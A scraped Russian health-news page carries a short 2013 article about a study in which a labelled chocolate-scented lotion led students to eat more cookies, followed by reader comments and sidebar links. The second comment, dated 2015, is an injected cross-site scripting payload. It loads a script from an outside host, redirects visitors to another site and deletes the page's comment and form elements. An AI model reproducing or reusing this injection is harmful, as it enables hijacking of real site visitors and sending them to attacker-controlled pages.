Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Ваш крем делает вас толст...  >>  Ваш крем делает вас толстой
 
Обратная связь
 

Ваш крем делает вас толстой

Размер шрифта
15 марта 2013 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Ученые выяснили, что кремы и лосьоны с аппетитными запахами заставляют женщин есть больше.

крема и запахи способствуют повышению аппетита

В исследовании приняли участие 58 студентов, которым было предложено воспользоваться лосьоном с шоколадным запахом и лосьоном без запаха. После того как студенты воспользовались лосьоном, ученые подсчитали, сколько шоколадного печенья они съели. На первый взгляд количество съеденного печенья в обеих группах не отличалось, но это было в том случае, когда студенты не видели этикетку. Если студенты видели этикетку, на которой было обозначено, что в тюбике содержится шоколадный лосьон, они съедали больше печенья.

Получается, что сам по себе шоколадный запах не усиливал аппетит, но в сочетании с этикеткой эффект был весьма отчетливый. «Наши чувства непостоянны и зависят от окружающей обстановки. Возможно, этикетка помогла участникам исследования распознать запах, на который они до этого не обращали внимания», – поясняет один из авторов исследования Джона Бергер.

Значит ли это, что, пользуясь лосьоном с фруктовым запахом, вы будете есть больше фруктов? «Вполне возможно», – считает Джона Бергер. «Если шоколадные запахи вызывают у нас тягу к шоколаду, то не исключено, что фруктовые будут вызывать тягу к фруктам».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

16 марта 2013 в 11:35

Цитировать   |   Пожаловаться

Самое эффективное в борьбе это спорт, "было, есть и будет". А так же сауна, баня, массаж. В комплексе эти вещи дают просто невероятный результат. Являюсь тренером, и знаю что говорю. Если нет возможности ходить на массаж, можно приобрести какие-нить массажные аппараты, тоже заствляют кровь лучше циркулировать. 

2 - zzzzzz

30 июня 2015 в 23:22

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
В это невозможно поверить! Шоколад помогает похудеть!   Ожирение делает вас черствым   Ура! Наконец-то найден участок мозга, отвечающий за переедание. Скоро будет новое лекарство   Обертывание для похудения  
14 марта 2013Ваш крем делает вас толстой 24 сентября 2012Шоколад улучшает настроение! Теперь это факт!
 
08 февраля 2011Почему шоколад можно считать «суперфруктом» 16 февраля 2010«Голодающий» жир уменьшает аппетит
 

Слайдшоу

1
Самые опасные стили питания: тайные перекусы
Что съесть, чтобы не объесться за праздничным столом
Признаки зависимости от еды

Тесты

1
Мифы о прыщах
Советы по уходу за кожей
Есть ли у вас избыточный вес?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.